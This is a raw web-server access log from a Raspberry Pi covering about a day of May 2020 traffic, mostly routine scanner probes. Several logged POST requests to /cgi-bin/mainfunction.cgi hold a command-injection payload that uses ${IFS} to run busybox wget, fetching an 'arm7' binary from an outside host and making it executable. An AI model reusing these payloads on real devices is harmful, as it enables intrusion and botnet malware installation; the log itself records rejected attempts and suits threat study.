Wed May 6 06:25:08 MDT 2020 06:25:08 up 71 days, 10:53, 1 user, load average: 0.67, 0.41, 0.31 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 71days 1:26m 2.81s /usr/bin/lxsession -s LXDE-pi -e LXDE 104.152.52.26 - - [06/May/2020:12:40:12 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 186.5.75.243 - - [06/May/2020:12:45:19 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 186.5.75.243 - - [06/May/2020:12:45:19 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 193.42.99.162 - - [06/May/2020:12:53:07 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 193.42.99.162 - - [06/May/2020:12:53:07 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 58.165.226.75 - - [06/May/2020:12:57:09 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 58.165.226.75 - - [06/May/2020:12:57:09 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 183.91.4.97 - - [06/May/2020:13:42:45 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 183.91.4.97 - - [06/May/2020:13:42:45 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 95.9.128.235 - - [06/May/2020:14:44:56 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 154.70.132.24 - - [06/May/2020:15:36:34 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 154.70.132.24 - - [06/May/2020:15:36:34 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 45.132.227.165 - - [06/May/2020:16:35:32 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 192.241.235.72 - - [06/May/2020:17:00:15 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 85.229.36.157 - - [06/May/2020:17:13:24 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 193.118.53.194 - - [06/May/2020:18:33:38 +0000] "GET /solr/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 52.232.188.182 - - [06/May/2020:19:56:25 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 5.101.64.77 - - [06/May/2020:20:11:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 71.6.165.200 - - [06/May/2020:20:36:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 71.6.165.200 - - [06/May/2020:20:36:30 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "" 71.6.165.200 - - [06/May/2020:20:36:30 +0000] "GET /sitemap.xml HTTP/1.1" 200 186 "" "" 71.6.165.200 - - [06/May/2020:20:36:31 +0000] "GET /.well-known/security.txt HTTP/1.1" 404 0 "" "" 71.6.165.200 - - [06/May/2020:20:36:32 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "python-requests/2.10.0" 31.220.166.144 - - [06/May/2020:20:59:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 202.107.188.14 - - [06/May/2020:21:10:41 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 202.107.188.14 - - [06/May/2020:21:10:48 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 202.107.188.14 - - [06/May/2020:21:10:49 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 202.107.188.14 - - [06/May/2020:21:10:50 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 202.107.188.14 - - [06/May/2020:21:10:51 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 202.107.188.14 - - [06/May/2020:21:10:51 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 202.107.188.14 - - [06/May/2020:21:10:52 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 202.107.188.14 - - [06/May/2020:21:10:52 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 202.107.188.14 - - [06/May/2020:21:10:53 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 202.107.188.14 - - [06/May/2020:21:10:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 77.45.75.110 - - [06/May/2020:21:38:08 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 159.65.89.211 - - [06/May/2020:21:50:56 +0000] "POST / HTTP/1.1" 501 0 "" "Python/3.6 aiohttp/3.6.2" 5.101.64.77 - - [06/May/2020:22:19:45 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.206.50 - - [06/May/2020:22:20:11 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 73.136.48.66 - - [06/May/2020:22:36:13 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 73.136.48.66 - - [06/May/2020:22:36:16 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 62.210.204.185 - - [06/May/2020:23:09:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 62.210.204.185 - - [06/May/2020:23:09:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 62.210.204.185 - - [06/May/2020:23:09:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 62.210.204.185 - - [06/May/2020:23:10:06 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 62.210.204.185 - - [06/May/2020:23:10:06 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 62.210.204.185 - - [06/May/2020:23:10:06 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 62.210.204.185 - - [06/May/2020:23:11:05 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 62.210.204.185 - - [06/May/2020:23:11:05 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 62.210.204.185 - - [06/May/2020:23:11:05 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 111.231.166.243 - - [07/May/2020:00:21:12 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 111.231.166.243 - - [07/May/2020:00:21:12 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 111.231.166.243 - - [07/May/2020:00:21:13 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 111.231.166.243 - - [07/May/2020:00:21:14 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 111.231.166.243 - - [07/May/2020:00:21:14 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 111.231.166.243 - - [07/May/2020:00:21:15 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 111.231.166.243 - - [07/May/2020:00:21:16 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 111.231.166.243 - - [07/May/2020:00:21:16 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 111.231.166.243 - - [07/May/2020:00:21:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 92.63.194.30 - - [07/May/2020:00:43:27 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 95.70.188.33 - - [07/May/2020:01:39:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 52.168.139.229 - - [07/May/2020:02:06:08 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 52.168.139.229 - - [07/May/2020:02:06:08 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 83.97.20.21 - - [07/May/2020:02:17:03 +0000] "GET / HTTP/1.0" 200 25000 "" "" 128.14.209.250 - - [07/May/2020:03:06:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 27.147.255.226 - - [07/May/2020:03:24:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 195.154.168.46 - - [07/May/2020:07:03:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 195.154.168.46 - - [07/May/2020:07:03:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 195.154.168.46 - - [07/May/2020:07:03:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 195.154.168.46 - - [07/May/2020:07:04:00 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 195.154.168.46 - - [07/May/2020:07:04:00 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 195.154.168.46 - - [07/May/2020:07:04:00 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 195.154.168.46 - - [07/May/2020:07:05:00 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 195.154.168.46 - - [07/May/2020:07:05:00 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 195.154.168.46 - - [07/May/2020:07:05:00 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 198.199.115.134 - - [07/May/2020:08:00:51 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 191.103.253.25 - - [07/May/2020:08:15:50 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 34.245.132.45 - - [07/May/2020:09:11:42 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 172.104.108.109 - - [07/May/2020:10:05:35 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 193.42.99.162 - - [07/May/2020:10:26:21 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 193.42.99.162 - - [07/May/2020:10:26:21 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 162.243.140.108 - - [07/May/2020:11:11:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 103.116.86.246 - - [07/May/2020:12:11:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" Thu May 7 06:25:07 MDT 2020 06:25:07 up 72 days, 10:53, 1 user, load average: 0.47, 0.32, 0.29 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 72days 1:26m 2.81s /usr/bin/lxsession -s LXDE-pi -e LXDE